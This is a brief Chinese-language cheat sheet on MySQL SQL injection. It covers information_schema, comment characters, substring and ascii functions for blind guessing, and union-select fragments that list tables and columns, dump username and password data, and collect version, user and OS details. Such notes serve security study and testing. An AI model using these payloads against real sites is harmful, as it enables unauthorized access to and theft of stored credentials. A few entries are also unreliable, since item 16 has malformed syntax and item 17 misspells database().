mysql注入必懂的知识点
(1)在mysql5.0版本以上中,存在一个自带数据库名information_schema自带 记录所有数据库名 表名 列名
(2)table_schema:数据库名
(3)group_concat(table_name):查询所有的表
(4)table_name:表名
(5)column_name:字段名
(6)数据库中符号“.”代表下一级,如user.user表示数据库user下的user表
(7)information_schema.tables:记录所有表名信息的表
(8)information_schema.columns:记录所有列名信息的表
(9) 猜解多个数据:limit x,1 (变动x)
(10)注释符:-- (后面有空格)(也就是–+) ,/**/ ,
简单语句使用
(1)show databases; //查看数据库
(2)use xxx; //使用某个数据库
(3)show tables; //查看该数据库的数据表
(4)desc xxx; //查看该数据表的结构
(5)select * from xxx; //查找某个数据表的所有内容
(6)select schema_name from information_schema.schemata; //猜数据库
(7) select table_name from information_schema.tables where table_schema='xxxxx'; //猜某数据库的数据表
(8)Select column_name from information_schema.columns where table_name='xxxxx'; //猜某表的所有列
(9)left(a,b) //从左侧截取 a 的前 b 位
(10)mid(column_name,start[,length]) //从位置start开始,截取column_name字符串的length位,与substr作用相同
(11)substr(string, start, length) //从位置start开始,截取字符串string的length长度,与mid作用相同
(12)ascii() //将某个字符转换成ascii码
(13)ord() //将某个字符转换成ascii码,同ascii()
(14)查询指定数据库下的表名信息
union select group_concat(table_name) from information_schema.tables where table_schema=‘数据库名’
(15)查询指定表下的列名信息
union select group_concat(column_name) from information_schema.columns where table_name='表名'
(16)查询指定数据
union select group_concat(username,password) from ’列名‘
(17)简单信息收集
(数据库版本version() 用户user() 名字databese() 操作系统@@version_compile_os)